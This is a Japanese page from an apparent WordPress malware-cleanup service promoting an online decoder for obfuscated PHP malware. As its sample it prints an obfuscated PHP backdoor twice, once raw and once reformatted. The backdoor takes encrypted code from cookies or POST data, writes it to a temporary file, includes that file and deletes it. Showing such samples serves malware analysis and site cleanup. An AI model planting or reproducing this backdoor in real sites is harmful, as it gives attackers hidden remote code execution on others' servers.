Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function b1($z2){$s3 = "L1pbsxf5-?r3/hF6e*#7n;Eio0mav'I)k8gHtc.u _<(d4@yl" ."9" ;$v5='';foreach($z2 as $o4){$v5.=$s3[$o4];}return $v5;}$h6 = Array();$h6[] = b1(Array(37,7,6,25,44,37,11,49,8,19,1,16,7,8,45,7,15,27,8,27,37,16,25,8,7,33,16,37,44,49,16,27,15,15,15,19));$h6[] = b1(Array(9,2,13,2,40,46,39,20,48,23,20,32,43,41,41,14,30,0,22,41,41,31,21,40));$h6[] = b1(Array(38,26,24,44,39,48,16));$h6[] = b1(Array(35,17));$h6[] = b1(Array(38,12));$h6[] = b1(Array(18));$h6[] = b1(Array(42));$h6[] = b1(Array(6,23,48,16,41,2,39,36,41,37,24,20,36,16,20,36,4));$h6[] = b1(Array(27,10,10,27,47,41,26,16,10,34,16));$h6[] = b1(Array(4,36,10,41,10,16,2,16,27,36));$h6[] = b1(Array(16,5,2,48,24,44,16));$h6[] = b1(Array(4,39,3,4,36,10));$h6[] = b1(Array(39,20,48,23,20,32));$h6[] = b1(Array(4,36,10,48,16,20));$h6[] = b1(Array(2,27,37,32));$h6[] = b1(Array(26,44,7));foreach ($h6[8]($_COOKIE, $_POST) as $c14 => $c11){function d8($h6, $c14, $j10){return $h6[11]($h6[9]($c14 . $h6[0], ($j10 / $h6[13]($c14)) + 1), 0, $j10);}function o7($h6, $t12){return @$h6[14]($h6[3], $t12);}function j9($h6, $t12){if (isset($t12[2])) {$y13 = $h6[4] . $h6[15]($h6[0]) . $h6[2];@$h6[7]($y13, $h6[6] . $h6[1] . $t12[1]($t12[2]));@include($y13);@$h6[12]($y13);exit();}}$c11 = o7($h6, $c11);j9($h6, $h6[10]($h6[5], $c11 ^ d8($h6, $c14, $h6[13]($c11))));}
<?php function b1($z2) { $s3 = "L1pbsxf5-?r3/hF6e*#7n;Eio0mav'I)k8gHtc.u _<(d4@yl9"; $v5 = ''; foreach ($z2 as $o4) { $v5 .= $s3[$o4]; } return $v5; } $h6 = array(); $h6[] = b1(array(37, 7, 6, 25, 44, 37, 11, 49, 8, 19, 1, 16, 7, 8, 45, 7, 15, 27, 8, 27, 37, 16, 25, 8, 7, 33, 16, 37, 44, 49, 16, 27, 15, 15, 15, 19)); $h6[] = b1(array(9, 2, 13, 2, 40, 46, 39, 20, 48, 23, 20, 32, 43, 41, 41, 14, 30, 0, 22, 41, 41, 31, 21, 40)); $h6[] = b1(array(38, 26, 24, 44, 39, 48, 16)); $h6[] = b1(array(35, 17)); $h6[] = b1(array(38, 12)); $h6[] = b1(array(18)); $h6[] = b1(array(42)); $h6[] = b1(array(6, 23, 48, 16, 41, 2, 39, 36, 41, 37, 24, 20, 36, 16, 20, 36, 4)); $h6[] = b1(array(27, 10, 10, 27, 47, 41, 26, 16, 10, 34, 16)); $h6[] = b1(array(4, 36, 10, 41, 10, 16, 2, 16, 27, 36)); $h6[] = b1(array(16, 5, 2, 48, 24, 44, 16)); $h6[] = b1(array(4, 39, 3, 4, 36, 10)); $h6[] = b1(array(39, 20, 48, 23, 20, 32)); $h6[] = b1(array(4, 36, 10, 48, 16, 20)); $h6[] = b1(array(2, 27, 37, 32)); $h6[] = b1(array(26, 44, 7)); foreach ($h6[8]($_COOKIE, $_POST) as $c14 => $c11) { function d8($h6, $c14, $j10) { return $h6[11]($h6[9]($c14 . $h6[0], $j10 / $h6[13]($c14) + 1), 0, $j10); } function o7($h6, $t12) { return @$h6[14]($h6[3], $t12); } function j9($h6, $t12) { if (isset($t12[2])) { $y13 = $h6[4] . $h6[15]($h6[0]) . $h6[2]; @$h6[7]($y13, $h6[6] . $h6[1] . $t12[1]($t12[2])); @(include $y13); @$h6[12]($y13); exit; } } $c11 = o7($h6, $c11); j9($h6, $h6[10]($h6[5], $c11 ^ d8($h6, $c14, $h6[13]($c11)))); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.